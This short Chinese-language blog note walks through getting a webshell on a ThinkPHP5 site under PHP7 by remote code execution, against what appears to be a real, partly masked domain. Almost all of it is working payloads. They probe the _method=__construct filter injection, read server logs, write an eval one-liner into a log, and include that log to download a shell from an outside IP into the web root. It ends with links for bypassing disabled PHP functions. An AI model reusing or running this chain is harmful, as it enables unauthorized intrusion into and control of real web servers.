ThinkPHP5 RCE在PHP7下getshell
前言:
之前没遇到了PHP7下thinkphp getshell,顺带记录一下。
1、探测漏洞
_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=1111111
2、通过phpinfo信息获取当前路径
/www/wwwroot/manage.cs.xx.com/public/index.php
3、php7下禁用的函数,所以system,assert等不能执行
passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,i ni_restore,dl,openlog,syslog,readlink,symlink,popepassthru
4、读取日志
_method=__construct&filter[]=readfile&server[REQUEST_METHOD]=/www/www root/manage.cs.sz-ccsdsds.com/runtime/log/202007/22.log
5、向日志中写入一句话
_method=__construct&filter[]=call_user_func&server[REQUEST_METHOD]=<?php @eval($_POST['cmd']);?>
6、文件包含日志getshell
_method=__construct&filter[]=think\__include_file&server[REQUEST_METH OD]=/www/wwwroot/manage.cs.sz-xxx.com/runtime/log/202007/22.log&c=fi le_put_contents("/www/wwwroot/manage.cs.sz-dsdsdp.com/public/2.php",fil e_get_contents("http://xx.xxx.xx.xx:88/2.php"));
7、Php7 bypass disable_functions 执行命令
https://www.exploit-db.com/exploits/47462 https://www.exploit-db.com/exploits/47446 https://www.exploit-db.com/exploits/48072